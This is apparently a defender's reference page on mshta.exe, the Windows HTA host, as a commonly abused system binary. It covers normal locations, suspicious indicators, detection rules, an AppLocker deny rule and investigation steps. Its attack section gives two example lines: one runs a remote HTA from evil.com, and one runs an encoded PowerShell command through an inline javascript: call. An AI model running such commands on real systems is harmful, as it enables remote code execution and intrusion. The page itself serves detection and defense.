anavem.
M
High RiskWindowsLegitimateCommonly Abused
mshta.exeSYSTEM UTILITY

mshta.exe - HTML Application Host Security Analysis

mshta.exe executes HTML Applications (.HTA files). It is a critical LOLBin abused for executing remote payloads, bypassing application controls, and phishing attacks. Any network activity or execution from URLs is highly suspicious.

4viewsLast verified: Jan 18, 2026

Risk Summary

HIGH priority. mshta.exe executing URLs or remote content is a strong indicator of compromise. Block mshta.exe for non-administrative users if possible.

Overview

What is mshta.exe?

mshta.exe is the Microsoft HTML Application Host, executing .HTA files.

Security Significance

  • LOLBin: Living-off-the-Land Binary
  • Remote Execution: Can execute HTA from URLs
  • Script Execution: Runs VBScript/JScript
  • Defense Evasion: Bypasses script restrictions

Normal Behavior

Normal Behavior

PropertyExpected Value
PathC:\Windows\System32\mshta.exe
Path (32-bit)C:\Windows\SysWOW64\mshta.exe
UsageRare in enterprise environments

Common Locations

C:\Windows\System32\mshta.exeC:\Windows\SysWOW64\mshta.exe

Suspicious Indicators

Suspicious Indicators

IndicatorRisk
URL in command lineCRITICAL
VBScript/JScript inlineCRITICAL
Parent is Office appCRITICAL
Network connectionsHIGH

Abuse Techniques

Attack Techniques

Remote HTA Execution

mshta.exe http://evil.com/payload.hta
mshta.exe "javascript:a=(new ActiveXObject('Wscript.Shell')).Run('powershell -enc ...');"

Phishing Delivery

HTA files sent via email or downloaded from malicious sites.

Detection Guidance

Detection

mshta.exe CommandLine CONTAINS "http" → ALERT: CRITICAL
mshta.exe CommandLine CONTAINS "javascript:" → ALERT: CRITICAL
mshta.exe Parent = Office apps → ALERT: CRITICAL

Block via AppLocker

<FilePathRule Action="Deny">
  <Conditions>
    <FilePathCondition Path="%SYSTEM32%\mshta.exe"/>
  </Conditions>
</FilePathRule>

Remediation Steps

  1. Block mshta.exe for standard users
  2. Monitor all mshta.exe execution
  3. Analyze command-line arguments
  4. Check for downloaded payloads

Investigation Checklist

  • Check command line for URLs
  • Review parent process
  • Check network connections
  • Analyze any downloaded files
  • Look for persistence mechanisms

MITRE ATT&CK Techniques

- - -